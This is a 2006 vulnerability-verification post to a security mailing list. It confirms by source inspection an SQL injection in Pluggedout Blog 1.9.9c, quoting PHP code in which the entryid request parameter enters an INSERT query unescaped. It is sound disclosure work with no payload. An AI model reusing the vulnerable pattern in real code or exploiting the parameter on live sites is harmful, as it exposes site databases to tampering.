[VIM] VERIFY Pluggedout Blog 1.9.9c exec.php SQL injection
Steven M. Christey
coley at mitre.org
Mon Feb 6 18:14:25 EST 2006
downloaded 1.9.9c as referenced here:
http://www.pluggedout.com/development/forums/viewtopic.php?t=831
I verified the SQL injection via source inspection.
In database.php, $entryid in db_sql_comment_add() is not escaped:
>function db_sql_comment_add($entryid,$name,$email,$url,$comment){
...
> $name = mysql_escape_string(strip_tags($name));
> $email = mysql_escape_string(strip_tags($email));
> $url = mysql_escape_string(strip_tags($url));
> $comment = mysql_escape_string(strip_tags($comment));
...
> $sql = "INSERT INTO ".$db_prefix."comments (nEntryId,cName,cEMail,cURL,cComment,dAdded)"
> ." VALUES (".$entryid.",'".$name."','".$email."','".$url."','".$comment."',now())";
In exec.php:
>function comment_add($entryid,$name="",$email="",$url="",$comment=""){
...
> $sql = db_sql_comment_add($entryid,$name,$email,$url,$comment);
So, if we control the 1st argument to comment_add() we are set.
Later in exec.php:
>switch ($_GET["action"]){
> case "comment_add":
> $result = comment_add($_REQUEST["entryid"],$_REQUEST["name"],$_REQUEST["email"],$_REQUEST["url"],$_REQUEST["comment"]);
So we have $_REQUEST["entryid"] added unquoted into a SQL query.
Note: other code in the same file seems to use $_REQUEST["entryid"] as
well.
- Steve
More information about the VIM
mailing list